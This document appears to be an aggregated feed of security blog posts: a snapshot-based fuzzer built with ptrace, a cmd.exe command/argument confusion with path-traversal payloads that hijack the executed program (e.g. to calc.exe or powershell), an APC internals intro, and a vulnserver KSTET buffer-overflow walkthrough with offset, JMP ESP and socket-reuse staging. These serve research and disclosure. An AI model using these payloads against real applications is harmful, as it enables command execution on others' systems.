555555756000-555555757000 rw-p 00002000 08:01 786686                     /home/h0mbre/fuzzing/dragonfly_dir/vuln
555555757000-555555778000 rw-p 00000000 00:00 0                          [heap]
7ffff7dcf000-7ffff7dd1000 rw-p 001eb000 08:01 1055012                    /lib/x86_64-linux-gnu/libc-2.27.so
7ffff7dd1000-7ffff7dd5000 rw-p 00000000 00:00 0 
7ffff7fe0000-7ffff7fe2000 rw-p 00000000 00:00 0 
7ffff7ffd000-7ffff7ffe000 rw-p 00028000 08:01 1054984                    /lib/x86_64-linux-gnu/ld-2.27.so
7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]

So that’s seven distinct sections of memory. You’ll notice that the heap is one of the sections. It is important to realize that our fuzzcase will be inserted into the heap, but the address in the heap that stores the fuzzcase will not be the same in our fuzzer as it is in GDB. This is likely due to some sort of environment variable difference between the two debuggers. If we look in GDB when we break on check_one() in vuln, we see that rax is a pointer to the beginning of our input, in this case the Canon_40D.jpg.

$rax   : 0x00005555557588b0  →  0x464a1000e0ffd8ff

That pointer, 0x00005555557588b0, is located in the heap. So all I had to do to find out where that pointer was in our debugger/fuzzer, was just break at the same point and use ptrace() to retrieve the rax value.
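In the fuzzer that just means reading rax with the register helper once we're stopped at the 'start' breakpoint, something along these lines:

// At the 'start' breakpoint, rax points at the input bytes in the
// debuggee's heap; that's where each new fuzz case gets written.
long long unsigned get_fuzzcase_addr(pid_t child_pid) {
    struct user_regs_struct registers;
    registers = get_regs(child_pid, registers);
    return registers.rax;
}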

I would break on check_one and then open /proc/$pid/maps to get the offsets within the program that contain writable memory sections, and then I would open /proc/$pid/mem and read from those offsets into a buffer to store the writable memory. This code was stored in a source file called snapshot.c which contained some definitions and functions to both capture snapshots and restore them. For this part, capturing writable memory, I used the following definitions and function:
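The SNAPSHOT_MEMORY struct definition itself isn't reproduced below; inferred from how create_snapshot uses it, it would be three parallel arrays along these lines:

// Inferred from the usage below: one entry per writable region parsed
// out of /proc/$pid/maps.
struct SNAPSHOT_MEMORY {
    long long unsigned maps_offset[7];          // base address of each region
    long long unsigned snapshot_buf_offset[7];  // where it lands in snapshot_buf
    size_t rdwr_length[7];                      // how many bytes to read/write
};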

unsigned char* create_snapshot(pid_t child_pid) {
 
    struct SNAPSHOT_MEMORY read_memory = {
        {
            // maps_offset
            0x555555756000,
            0x7ffff7dcf000,
            0x7ffff7dd1000,
            0x7ffff7fe0000,
            0x7ffff7ffd000,
            0x7ffff7ffe000,
            0x7ffffffde000
        },
        {
            // snapshot_buf_offset
            0x0,
            0xFFF,
            0x2FFF,
            0x6FFF,
            0x8FFF,
            0x9FFF,
            0xAFFF
        },
        {
            // rdwr length
            0x1000,
            0x2000,
            0x4000,
            0x2000,
            0x1000,
            0x1000,
            0x21000
        }
    };  
 
    unsigned char* snapshot_buf = (unsigned char*)malloc(0x2C000);
 
    // this is just /proc/$pid/mem
    char proc_mem[0x20] = { 0 };
    sprintf(proc_mem, "/proc/%d/mem", child_pid);
 
    // open /proc/$pid/mem for reading
    // hardcoded offsets are from typical /proc/$pid/maps at main()
    int mem_fd = open(proc_mem, O_RDONLY);
    if (mem_fd == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("open");
        exit(errno);
    }
 
    // this loop will:
    //  -- go to an offset within /proc/$pid/mem via lseek()
    //  -- read x-pages of memory from that offset into the snapshot buffer
    //  -- adjust the snapshot buffer offset so nothing is overwritten in it
    int lseek_result, bytes_read;
    for (int i = 0; i < 7; i++) {
        //printf("dragonfly> Reading from offset: %d\n", i+1);
        lseek_result = lseek(mem_fd, read_memory.maps_offset[i], SEEK_SET);
        if (lseek_result == -1) {
            fprintf(stderr, "dragonfly> Error (%d) during ", errno);
            perror("lseek");
            exit(errno);
        }
 
        bytes_read = read(mem_fd,
            (unsigned char*)(snapshot_buf + read_memory.snapshot_buf_offset[i]),
            read_memory.rdwr_length[i]);
        if (bytes_read == -1) {
            fprintf(stderr, "dragonfly> Error (%d) during ", errno);
            perror("read");
            exit(errno);
        }
    }
 
    close(mem_fd);
    return snapshot_buf;
}

You can see that I hardcoded all the offsets and the lengths of the sections. Keep in mind, this doesn’t need to be fast. We’re only capturing a snapshot once, so it’s ok to interact with the file system. So we’ll loop through these 7 offsets and lengths and write them all into a buffer called snapshot_buf which will be stored in our fuzzer’s heap. So now we have both the register states and the memory states of our process as it begins check_one (our ‘start’ breakpoint).

Let’s now figure out how to restore the snapshot when we reach our ‘end’ breakpoint.

Restoring Snapshot

To restore the process memory state, we could just write to /proc/$pid/mem the same way we read from it; however, this portion needs to be fast since we are now doing it every fuzzing iteration. Interacting with the file system every fuzzing iteration will slow us down big time. Luckily, since Linux kernel version 3.2, there is support for a much faster process-to-process memory reading/writing API that we can leverage called process_vm_writev(). Since this call copies data directly between the two processes' address spaces, without the data passing through kernel buffers and without involving the file system, it will greatly increase our write speeds.

It looks kind of confusing at first, but the man page example is really all you need to understand how it works. I've opted to just hardcode all of the offsets since this fuzzer is simply a POC, and we can restore the writable memory as follows:

void restore_snapshot(unsigned char* snapshot_buf, pid_t child_pid) {
 
    ssize_t bytes_written = 0;
    // we're writing *from* 7 different offsets within snapshot_buf
    struct iovec local[7];
    // we're writing *to* 7 separate sections of writable memory here
    struct iovec remote[7];
 
    // this struct is the local buffer we want to write from into the 
    // struct that is 'remote' (ie, the child process where we'll overwrite
    // all of the non-heap writable memory sections that we parsed from 
    // proc/$pid/memory)
    local[0].iov_base = snapshot_buf;
    local[0].iov_len = 0x1000;
    local[1].iov_base = (unsigned char*)(snapshot_buf + 0xFFF);
    local[1].iov_len = 0x2000;
    local[2].iov_base = (unsigned char*)(snapshot_buf + 0x2FFF);
    local[2].iov_len = 0x4000;
    local[3].iov_base = (unsigned char*)(snapshot_buf + 0x6FFF);
    local[3].iov_len = 0x2000;
    local[4].iov_base = (unsigned char*)(snapshot_buf + 0x8FFF);
    local[4].iov_len = 0x1000;
    local[5].iov_base = (unsigned char*)(snapshot_buf + 0x9FFF);
    local[5].iov_len = 0x1000;
    local[6].iov_base = (unsigned char*)(snapshot_buf + 0xAFFF);
    local[6].iov_len = 0x21000;
 
    // just hardcoding the base addresses that are writable memory
    // that we gleaned from /proc/pid/maps and their lengths
    remote[0].iov_base = (void*)0x555555756000;
    remote[0].iov_len = 0x1000;
    remote[1].iov_base = (void*)0x7ffff7dcf000;
    remote[1].iov_len = 0x2000;
    remote[2].iov_base = (void*)0x7ffff7dd1000;
    remote[2].iov_len = 0x4000;
    remote[3].iov_base = (void*)0x7ffff7fe0000;
    remote[3].iov_len = 0x2000;
    remote[4].iov_base = (void*)0x7ffff7ffd000;
    remote[4].iov_len = 0x1000;
    remote[5].iov_base = (void*)0x7ffff7ffe000;
    remote[5].iov_len = 0x1000;
    remote[6].iov_base = (void*)0x7ffffffde000;
    remote[6].iov_len = 0x21000;
 
    bytes_written = process_vm_writev(child_pid, local, 7, remote, 7, 0);
    //printf("dragonfly> %ld bytes written\n", bytes_written);
}

So for 7 different writable sections, we’ll write into the debuggee process at the offsets defined in /proc/$pid/maps from our snapshot_buf that has the pristine snapshot data. AND IT WILL BE FAST!

So now that we have the ability to restore the writable memory, we only need to restore the register states to complete our rudimentary snapshot mechanism. That is easy using the functions defined in ptrace_helpers, and you can see the two function calls within the fuzzing loop as follows:

// restore writable memory from /proc/$pid/maps to its state at Start
restore_snapshot(snapshot_buf, child_pid);

// restore registers to their state at Start
set_regs(child_pid, snapshot_registers);

So that’s how our snapshot process works and in my testing, we achieved about a 20-30x speed-up over the dumb fuzzer!

Making our Dumb Fuzzer Smart

At this point, we still have a dumb fuzzer (albeit much faster now). We need to be able to track code coverage. A very simple way to do this would be to place a breakpoint at every ‘basic block’ between check_one and exit so that if we reach new code, a breakpoint will be reached and we can do_something() there.

This is exactly what I did, except for simplicity's sake I just placed 'dynamic' (code coverage) breakpoints at the entry points to check_two and check_three. When a 'dynamic' breakpoint is reached, we save the input that reached the code into an array of char pointers called the 'corpus', and we can now start mutating those saved inputs instead of just our 'prototype' input of Canon_40D.jpg.

So our code coverage feedback mechanism will work like this:

  1. Mutate prototype input and insert the fuzzcase into the heap
  2. Resume debuggee
  3. If ‘dynamic breakpoint’ reached, save input into corpus
  4. If corpus > 0, randomly pick an input from the corpus or the prototype and repeat from step 1

We also have to remove the dynamic breakpoint so that we stop breaking on it. Good thing we already know how to do this well!
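Putting that together, the SIGTRAP handling for a 'dynamic' breakpoint could look something like this sketch (the corpus bookkeeping names corpus, corpus_count, dyn_bp_addrs, dyn_bp_values and NUM_DYN_BPS are my own placeholders, not the fuzzer's actual variables):

// Sketch: called when the child stops on SIGTRAP at an address that is
// not the 'end' breakpoint. Saves the input as new coverage and removes
// the dynamic breakpoint so we stop breaking on it.
void handle_dynamic_breakpoint(pid_t child_pid, unsigned char *fuzzcase,
                               size_t len) {
    struct user_regs_struct registers;
    registers = get_regs(child_pid, registers);
    long long unsigned hit = registers.rip - 1;

    for (int i = 0; i < NUM_DYN_BPS; i++) {
        if (hit == dyn_bp_addrs[i]) {
            // new coverage: save a copy of the input that reached this code
            corpus[corpus_count] = malloc(len);
            memcpy(corpus[corpus_count], fuzzcase, len);
            corpus_count++;

            // restore the original byte and rewind rip so execution continues
            revert_breakpoint(dyn_bp_addrs[i], dyn_bp_values[i], child_pid);
            registers.rip = hit;
            set_regs(child_pid, registers);
            break;
        }
    }
}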

As you may remember from the last post, code coverage is crucial to our ability to crash this test binary vuln as it performs 3 byte comparisons that all must pass before it crashes. We determined mathematically last post that our chances of passing the first check is about 1 in 13 thousand and our chances of passing the first two checks is about 1 in 170 million. Because we’re saving input off that passes check_one and mutating it further, we can reduce the probability of passing check_two down to something close to the 1 in 13 thousand figure. This also applies to inputs that then pass check_two and we can therefore reach and pass check_three with ease.

Running The Fuzzer

The first stage of our fuzzer, which collects snapshot data and sets 'dynamic breakpoints' for code coverage, completes very quickly even though it's not meant to be fast. This is because all the values are hardcoded since our target is extremely simple. In a complex multi-threaded target we would need some way to script the discovery of dynamic breakpoint addresses via Ghidra or objdump or something, and we'd need to have that script write a configuration file for our fuzzer, but that's far off. For now, for a POC, this works fine.

h0mbre@pwn:~/fuzzing/dragonfly_dir$ ./dragonfly 

dragonfly> debuggee pid: 12156
dragonfly> setting 'start/end' breakpoints:

   start-> 0x555555554b41
   end  -> 0x5555555548c0

dragonfly> set dynamic breakpoints: 

           0x555555554b7d
           0x555555554bb9

dragonfly> collecting snapshot data
dragonfly> snapshot collection complete
dragonfly> press any key to start fuzzing!

You can see that the fuzzer helpfully displays the ‘start’ and ‘end’ breakpoints as well as lists the ‘dynamic breakpoints’ for us so that we can check to see that they are correct before fuzzing. The fuzzer pauses and waits for us to press any key to start fuzzing. We can also see that the snapshot data collection has completed successfully so now we are broken on ‘start’ and have all the data we need to start fuzzing.

Once we press enter, we get a statistics output that shows us how the fuzzing is going:

dragonfly> stats (target:vuln, pid:12156)

fc/s       : 41720
crashes    : 5
iterations : 0.3m
coverage   : 2/2 (%100.00)

As you can see, it found both ‘dynamic breakpoints’ almost instantly and is currently running about 41k fuzzing iterations per second of CPU time (about 20-30x faster in wall time than our dumb fuzzer).

Most importantly, you can see that we were able to crash the binary 5 times already in just 300k iterations! We could’ve never done this with our previous fuzzer.

vv CLICK THIS TO WATCH IT IN ACTION vv

asciicast

Conclusion

One of the biggest takeaways for me from doing this was just how much more performance you can squeeze out of a fuzzer if you customize it for your target. Out-of-the-box frameworks like AFL are great and incredibly impressive tools; I hope this fuzzer will one day grow into something comparable. We were able to run about 20-30x faster than AFL for this really simple target and were able to crash it almost instantly with just a little bit of reverse engineering and customization. I thought this was really neat and instructive. In the future, when I adapt this fuzzer for a real target, I should be able to outperform general-purpose frameworks again.

Ideas for Improvement

Where to begin? We have a lot of areas where we can improve but some immediate improvements that can be made are:

  • optimize performance by refactoring code, changing location of global variables
  • enabling the dynamic configuration of the fuzzer via a config file that can be created via a Python script
  • implementing more mutation methods
  • implementing more code coverage mechanisms
  • developing the fuzzer so that many instances can run in parallel and share discovered inputs/coverage data

Perhaps we will see these improvements in a subsequent post and the results of fuzzing a real target with the same general approach. Until then!

Code

All of the code for this blogpost can be found here: https://github.com/h0mbre/Fuzzing/tree/master/Caveman4

Cmd Hijack - a command/argument confusion with path traversal in cmd.exe

10 June 2020 at 05:43

This one is about an interesting behavior 🤭 I identified in cmd.exe in result of many weeks of intermittent (private time, every now and then) research in pursuit of some new OS Command Injection attack vectors.

So I was mostly trying to:

  • find an encoding mismatch between some command check/sanitization code and the rest of the program, allowing me to smuggle the ASCII version of the existing command separators in the second byte of a wide char (for a moment I believed I had it in the StripQuotes function - I was wrong ¯\(ツ)/¯),
  • discover some hidden cmd.exe's counterpart of the unix shells' backtick operator,
  • find a command separator alternative to |, & and \n - which long ago resulted in the discovery of an interesting and still alive, but very rarely occurring vulnerability - https://vuldb.com/?id.93602.

And I eventually ended up finding a command/argument confusion with path traversal ... or whatever the fuck this is 😃

For the lazy with no patience to read the whole thing, here comes the magic trick:


Tested on Windows 10 Pro x64 (Microsoft Windows [Version 10.0.18363.836]), cmd.exe version: 10.0.18362.449 (SHA256: FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5). But should work with earlier versions as well... probably with all versions.

Some more context

Let's consider the following command line: cmd.exe /c "ping 127.0.0.1",
where 127.0.0.1 is the argument controlled by the user in an application that runs an external command (in this sample case it's ping). This exact syntax - with the command preceded by the /c switch and enclosed in double quotes - is the default way cmd.exe is used by external programs to execute system commands (e.g. the PHP shell_exec() function and its variants).

Now, the user can trick cmd.exe into running calc.exe instead of ping.exe by providing an argument like 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe, traversing the path to the executable of their choice, which cmd.exe will run instead of the ping.exe binary.

So the full command line becomes:

cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe"

The potential impact of this includes Denial of Service, Information Disclosure, Arbitrary Code Execution (depending on the target application and system).
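To make the scenario concrete, here is my own minimal illustration (not code from the post) of the kind of native caller this bites - a program that builds the classic cmd.exe /c "ping <user input>" command line from untrusted input:

#include <windows.h>
#include <stdio.h>

// Hypothetical example: argv[1] is untrusted. No command separators are
// needed for the hijack, only the path traversal payload shown above.
int main(int argc, char **argv) {
    if (argc < 2) return 1;

    char cmdline[512];
    snprintf(cmdline, sizeof(cmdline), "cmd.exe /c \"ping %s\"", argv[1]);

    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi;
    if (!CreateProcessA(NULL, cmdline, NULL, NULL, FALSE, 0, NULL, NULL,
                        &si, &pi)) {
        printf("CreateProcess failed: %lu\n", GetLastError());
        return 1;
    }
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
}

Passing 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe as the argument to a program like this reproduces the hijack described above.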


Although I am fairly sure there are other scenarios involving OS command execution where part of the command line comes from a different security context than the one the final command is executed with (some services maybe? I haven't searched myself yet) - anyway, let's use a web application as an example.

Consider the following sample PHP code:

Due to the use of escapeshellcmd() it is not vulnerable to known command injection vectors (except for argument injection, but that's a slightly different story and does not allow RCE with the list of arguments ping.exe supports - no built-in execution arguments like find's -exec).

And I know, I know, some of you will point out that in this case escapeshellarg() should be used instead - and yup, you would be right, especially since putting the argument in quotes in fact prevents this behavior, as in that case cmd.exe properly identifies the command to run (ping.exe). The trick does not work when the argument is enclosed in single/double quotes.

Anyway - the use of escapeshellcmd() instead of escapeshellarg() is very common. I noticed that while - after finding and registering CVE-2020-12669, CVE-2020-12742 and CVE-2020-12743 - I ended up spending one more week running automated source code analysis scans against more open source projects and manually following up the results, using my old evil SCA tool for PHP. That's also what made me fed up with PHP again quite quickly, pushing me back to cmd.exe, which finally let me discover what this blog post is mostly about.

I am fairly sure there are applications vulnerable to this (doing OS command injection sanity checks, but failing to prevent path traversal and enclose the argument in quotes).

The notion of similar behavior existing in other command interpreters is also worth entertaining.

An extended POC

Normal use:

Abuse:

Now, this is what normal use looks like in Sysmon log (process creation event):

So basically the child process (ping.exe) is created with a command line equal to the double-quoted value following the /c switch in the parent process (cmd.exe) command line.

Now, the same for the above ipconfig.exe hijack:

And it turns out we are not limited to executables located in directories present in  %PATH%. We can traverse to any location on the same disk.

Also, we are not limited to the EXE extension, neither to the list of "executable" extensions contained in the %PATHEXT% variable (which by default is .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC - basically these are the extensions cmd.exe will try to add to the name of the command if no extension is provided, e.g. when ping is used instead of explicit ping.exe). cmd.exe runs stuff regardless to the extension, something I noticed long ago (https://twitter.com/julianpentest/status/1203386223227572224).

And one more thing - additional arguments can be added between the original command and the smuggled executable path.

Let's see all of this combined.

For demonstration purposes, the following C program was compiled and linked into a PE executable (it simply prints out its own command line):
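A minimal version of such a program, which just prints its own command line, looks like this:

#include <windows.h>
#include <stdio.h>

// Minimal stand-in for the demo binary: print the command line we were
// started with.
int main(void) {
    printf("%s\n", GetCommandLineA());
    return 0;
}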

Copied the EXE into C:\xampp\tmp\cmd.png (consider this as an example of ANY location a malicious user could write a file).

Action:

So we just effectively achieved an equivalent of actual (exec, not just read) PE Local File Inclusion in an otherwise-safe PHP ping script.

But I don't think that our options end here.

The potential for extending this into a full RCE without chaining with file upload/control

I am certain it is also possible to turn this into an RCE even without the possibility of fully/partially controlling any file in the target file system, by delivering the payload in the command line itself, thus creating a sort of polymorphic malicious command line payload.

When running the target executable, cmd.exe passes to it the entire part of the command line following the /c switch.


For instance:

cmd.exe /c "ping 127.0.0.1/../../../../../../../windows/system32/calc.exe"

executes c:\windows\system32\calc.exe with command line equal ping 127.0.0.1/../../../../../../../windows/system32/calc.exe.

And, as presented in the extended POC, it is possible to hijack the executable even when providing multiple arguments, leading to command lines like:

ping THE PLACE FOR THE RCE PAYLOAD ARGS 127.0.0.1/../../path/to/lol.bin

This is the command line lol.bin would be executed with. Finding a proxy execution LOLBin tolerant enough of invalid arguments (since we as attackers cannot fully control them) could turn this into a full RCE.
The LOLBin we need is one accepting/ignoring the first argument (which is the hardcoded command we cannot control, in our example "ping"), while also willing to accept/ignore the last one (which is the traversed path to itself). Something like https://lolbas-project.github.io/lolbas/Binaries/Ieexec/, but actually accepting multiple arguments while quietly ignoring the incorrect ones.

Also, I was thinking of powershell.

Running this:

cmd.exe /c "ping ;calc.exe; 127.0.0.1/../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/POWERSHELL.EXE"

makes powershell start with command line of

ping ;calc.exe 127.0.0.1/../../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/POWERSHELL.EXE

I expected it to treat the command line as a string of inline commands and run calc.exe after running ping.exe. Yes, I know, a semicolon is used here to separate ping from calc - but the semicolon character is NOT a command separator in cmd.exe, while it is in powershell (on the other hand, almost all OS Command Injection filters block it anyway, as they are written universally with multiple platforms in mind - because obviously the semicolon IS a command separator in unix shells).

A perfect syntax to have supported here would be some sort of simple base64-encoded code injection like powershell's -EncodedCommand, if a way could be found to make it work even when preceded by a string we cannot control. Anyway, this attempt led to powershell running in interactive mode instead of treating the command line as a sequence of inline commands to execute.

Anyway, at this point turning this into an RCE boils down to researching the behaviors of particular LOLbins, focusing on the way they process their command line, rather than researching cmd.exe itself (although yes, I also thought about self-chaining and abusing cmd.exe as the LOLbin for this, in hope for taking advantage of some nuances between the way it parses its command line when it does and when it does not start with the /c switch).

Stumbling upon and some analysis

I know this looks silly enough to suggest I found it while ramming that sample PHP code over HTTP with Burp while watching Procmon with proper filters... or something like that (which isn't such a bad idea by the way)... as opposed to writing a custom cmd.exe fuzzer (no, you don't need to tell me my code is far away from elegant, I did not expect anyone would read it neither that I would reuse it), then after obtaining rather boring and disappointing results, spending weeks on static analysis with Ghidra (thanks NSA, I am literally in love with this tool), followed up with more weeks of further work with Ghidra while simultaneously manually debugging with x64dbg while further expanding comments in the Ghidra project 😂

cmd.exe command line processing starts in the CheckSwitches function (which gets called from Init, which itself gets called from main). CheckSwitches is responsible for determining what switches (like /c, /k, /v:on etc.) cmd.exe was called with. The full list of options can be found in cmd.exe /? help (which by the way, to my surprise, reflects the actual functionality pretty well).  

I spent a good deal of time analyzing it carefully, looking for hidden switches, logic issues allowing to smuggle multiple switches via the command line by jumping out of the double quotes, quote-stripping issues and whatever else would just manifest to me as I dug in.

The beginning of the CheckSwitches function after some naming editions and notes I took

If the /c switch is detected, processing moves to the actual command line enclosed in double quotes - which is the most common mode cmd.exe is used and the only one the rest of this write-up is about:

The same mode can be attained with the /r switch:

After some further logic, doing, among other things, parsing the quoted string and making some sanity fixes (like removing any spaces if any found from its beginning), a function with a very encouraging and self-explanatory name is called:

Disassembly view:

Decompiler view:

At this point it was clear it was high time for debugging to come into play.

By default x64dbg will set up a breakpoint at the entry point - mainCRTStartup.

This is a good opportunity to set an arbitrary command line:

Then start cmd.exe once again (Debug-> Restart).

We also set up a breakpoint on the top of the SearchForExecutable function, so we catch all its instances.

We run into the first instance of SearchForExecutable:

We can see that the double-quoted proper command line (after cmd.exe skips the preceding cmd.exe /c) along with its double quotes is held in RBX and R15. Also, the value on the top of the stack (right bottom corner) contains an address pointing at CheckSwitches - it's the saved RET. So we know this instance is called from CheckSwitches.

If we hit F9 again, we will run into the second instance of SearchForExecutable, but this time the command line string is held in RAX, RDI and R11, while the call originates from another function named ECWork:

This second instance resolves and returns the full path to ping.exe.

Below we can see the body of the ECWork function, with a call to SearchForExecutable (marked black). This is where the RIP was at when the screenshot was taken - right before the second call of SearchForExecutable:

Now, on below screenshot the SearchForExecutable call already returned (note the full path to ping.exe pointed at with the address held in R14). Fifteen instructions later the ExecPgm function is called, using the newly resolved executable path to create the new process:

So - seeing SearchForExecutable being called against the whole ping 127.0.0.1 string (uh yeah, those evil spaces) suggests potential confusion between the full command line and an actual file name... This gave me the initial idea to check whether the executable could be hijacked by literally creating one under a name equal to the command line that would make it run:

Uh really? Interesting. I decided to have a look with Procmon in order to see what file names cmd.exe attempts to open with CreateFile:

So yes, the result confirmed opening a copy of calc.exe from the file literally named ping .PNG in the current working directory:

Now, interestingly, I would not see any results with this Procmon filter  (Operation = CreateFile) if I did not create the file first...

One would expect to see cmd.exe mindlessly calling CreateFile against nonexistent files with names being various mutations of the command line, with NAME NOT FOUND result - the usual way one would search for potential DLL side loading issues... But NOT in this case - cmd.exe actually checks whether such file exists before calling CreateFile, by calling QueryDirectory instead:

For this purpose, in Procmon, it is more accurate to specify a filter based on the payload's unique magic string (like PNG in this case, as this would be the string we as attackers could potentially control) occurring in the Path property instead of filtering based on the Operation.

"So, anyway, this isn't very useful" - I thought and got back to x64dbg.

"We can only hijack the command if we can literally write a file under a very dodgy name into the target application's current directory... " - I kept thinking - "... Current directory... u sure ONLY current directory?" - and at this point my path traversal reflex lit up, a seemingly crazy and desperate idea to attempt traversal payloads against parts of the command line parsed by SearchForExecutable.

Which made me manually change the command line to ping 127.0.0.1/../calc.exe and restart debugging... while already thinking of modifying the cmd.exe fuzzer in order to throw a set of payloads generated for this purpose with psychoPATH against cmd.exe... But that never happened because of what I saw after I hit F9 one more time.

Below we can see x64dbg with cmd.exe run with the cmd.exe /c "ping 127.0.0.1/../calc.exe" command line (see RDI). We are hanging right after the second SearchForExecutable call, the one originating from the bottom of the ECWork function, just a few instructions before calling ExecPgm, which is about to execute the PE pointed to by R14. The full path to C:\Windows\System32\calc.exe present in R14 is the result of the just-returned SearchForExecutable("ping 127.0.0.1/../calc.exe") call preceding the current RIP:

The traversal appears to be relative to a subdirectory of the current working directory (calc.exe is at c:\windows\system32\calc.exe):

"Or maybe this is just a result of a failed path traversal sanity check, only removing the first occurrence of ../?" - I kept wondering.

So I dug further into the SearchForExecutable function, also trying to find out why variants of the argument created by splitting it on spaces are considered and why the right-most one is chosen first when found.

I narrowed down the culprit code to the instructions within the SearchForExecutable function, between the call to mystrcspn at 14000ff64 and the calls to the FullPath function at 14001005b and exists_ex at 140010414:

In the meantime I received the following feedback from Microsoft:

We do have a blog post that helps describe the behavior you have documented: https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats.

Cmd.exe first tries to interpret the whole string as a path: "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe” string is being treated as a relative path, so “ping 127.0.0.1” is interpreted as a segment in that path, and is removed due to the preceding “../” this should help explain why you shouldn’t be able to use the user controlled input string to pass arguments to the executable.

There are a lot a cases that would require that behaviour, e.g. cmd.exe /c "....\Program Files (x86)\Internet Explorer\iexplore.exe" we wouldn’t want that to try to run some program “....\Program” with the argument “Files (x86)\Internet Explorer\iexplore.exe”.

It’s only if the full string can’t be resolved to a valid path, that it splits on spaces and takes everything before the first space as the intended executable name (hence why “ping 127.0.0.1” does work).

So yeah... those evil spaces and quoting.

From this point, I only escalated the issue by confirming the possibility of traversing to arbitrary directories as well as the ability to force execution of PE files with arbitrary extensions.

Interestingly, this slightly resembles the common unquoted service path issue, except that in this case the most-to-the-right variant gets prioritized.

The disclosure

Upon discovery I documented and reported this peculiarity to MSRC. After little less than six days the report was picked up and reviewed. About a week later Microsoft completed their assessment, concluding that this does not meet the bar for security servicing:

On one hand, I was a little disappointed that Microsoft would not address it and that I was not getting the CVE in cmd.exe I had wanted for some time.

On the other hand, at least nothing's holding me back from sharing it already and hopefully it will be around for some time so we can play with it 😃 It's not a vulnerability, it's a technique 😃

I would like to thank Microsoft for making all of this possible - and for being nice enough to even offer me a review of this post, which was completely unexpected but obviously highly appreciated.

Some reflections

Researching stuff can sometimes appear to be a lonely and thankless journey, especially after days and weeks of seemingly fruitless drudging and sculpturing - but I realized this is just a short-sighted perception, one in which success is exclusively measured by the number of uncovered vulnerabilities/features/interesting behaviors (no point arguing about the terminology here 😃). In offensive security we rarely pay attention to the stuff we tried and failed at, even though those failed attempts are equally important - if we did not try, we would never know what's there (and we'd risk false negatives). Curiosity and the need to know. And software is full of surprises.

Plus, simply dealing with a particular subject (like analyzing a given program/protocol/format) and gradually getting more and more familiar with it feeds our minds with new mental models, which makes us automatically come up with more and more ideas for potential bugs, scenarios and weird behaviors as we keep hacking. A journey through code accompanied by new inspirations, awarded with new knowledge and the peace of mind resulting from answering questions... sometimes ending with great satisfaction from a unique discovery.

APC Series: User APC Internals

2 June 2020 at 21:00
Hey! This is the second part of the APC Series, where I explore the internals of APC objects in Windows. If you haven't already, I recommend reading the first post about the User APC API. In this part I'll explain: How are user APCs queued from kernel mode? How are user APCs implemented in the Windows kernel? How are user APCs delivered to user mode? In this post I won't cover the internals of Special User APCs, because Special User APCs rely on Kernel APCs to perform their operation - I'll explore this type in a future post after I explain Kernel APCs.

Multi-Stage EIP redirection Buffer Overflow -- Win API / Socket Reuse

Kali Linux
Windows Vista
Vulnerable application: vulnserver.exe (KSTET)


Vulnserver.exe is meant to be exploited mainly through buffer overflow vulnerabilities. More info about this application and where to download it can be found here:

~~~~~~//*****//~~~~~~

We get the initial crash using the following fuzzer.


...and we get a pretty vanilla EIP overwrite buffer overflow.


Calculating the offset as usual using Metasploit's pattern_offset.rb and pattern_create.rb



We have our offset value, so at this point we need to find a JMP ESP address and redirect EIP to it. We will use address 0x625011AF.
Note that you can use Immunity Debugger's mona.py or just search for it manually.


Updated POC with the offset value and JMP ESP address.


As we examine the crash in Immunity Debugger, we can see the correct offset value and hit our JMP ESP address; however, once the jump is taken, our Cs have been truncated. As a result, this only gives us about 20 bytes of space.


That said, we will use the C buffer space to do a reverse jmp into the A's address space, which gives us roughly 66 bytes to work with.

The reverse jump EB B8 will jump from address 0x00D0F9E0 to 0x00D0F99A


We update and send our exploit...then take the jump.


Once again, we examine the crash and see that we have successfully landed on A's address space.


Now the fun part begins..thanks to https://purpl3f0xsec.tech/2019/09/04/Vulnserver-KSTET-Socket-Reuse.html for pointing out this type of vector.

Stolen from purpl3f0xsec...the diagram below shows how the socket connection is established between the client and the vulnserver.

Basically, we will reuse the recv() function call. The idea is to utilize the established socket connection and have our first stage payload set up a new call to recv(). Once that recv() call is up and running, we will then send our second stage payload.

The second stage payload will not overflow the buffer so it will not get truncated.



More information about the recv() can be found here: https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-recv

To set up recv(), we need the following parameters.


Socket = socket descriptor

Buffer = memory location for our second stage payload

BufferSize = memory space allocation for our second stage payload

Flags = Socket flags…can be set to Null


These are the parameters that will need to be pushed to the stack (don't forget the reverse order).
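For reference, the Winsock prototype of recv() maps one-to-one onto those four parameters:

// From <winsock2.h>: the four arguments our stager has to place on the stack.
int recv(
    SOCKET s,     // socket descriptor of the established connection
    char  *buf,   // where the incoming bytes (our second stage) will land
    int    len,   // size of that buffer
    int    flags  // behaviour flags; 0 (no flags) for our purposes
);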


Before populating the parameters, I grabbed the address of recv(), which can be done by going to the .text entry point and scrolling down until we find the imported functions.


Address 0x00401953 references recv(), but if you double-click it... it shows the actual address, which is 0x0040252C



I set a breakpoint at address 0x0040252C.


Once we hit our breakpoint, if you look at the stack, we can see the parameters that are currently loaded in the stack.


Note that at this point...both EAX and EBX registers have the socket descriptor value of 0x00000050. This is because of the instructions at these addresses: 0x0040194A and 0x00401950


0x0040194A - MOV EAX, DWORD PTR SS: [EBP-420]


This is a pointer to [EBP-420], so whatever value is loaded at [EBP-420] gets moved into EAX


We can see that EBP currently points to address 0x00EEFF88 so subtracting 420 should get us to the address that holds the socket descriptor.

 



As expected, if we jump to address 0x00EEFB68...we can see the value 0x00000050 loaded in.



Now, address 0x00401950 has the following instructions..


0x00401950 - MOV DWORD PTR SS:[ESP], EAX


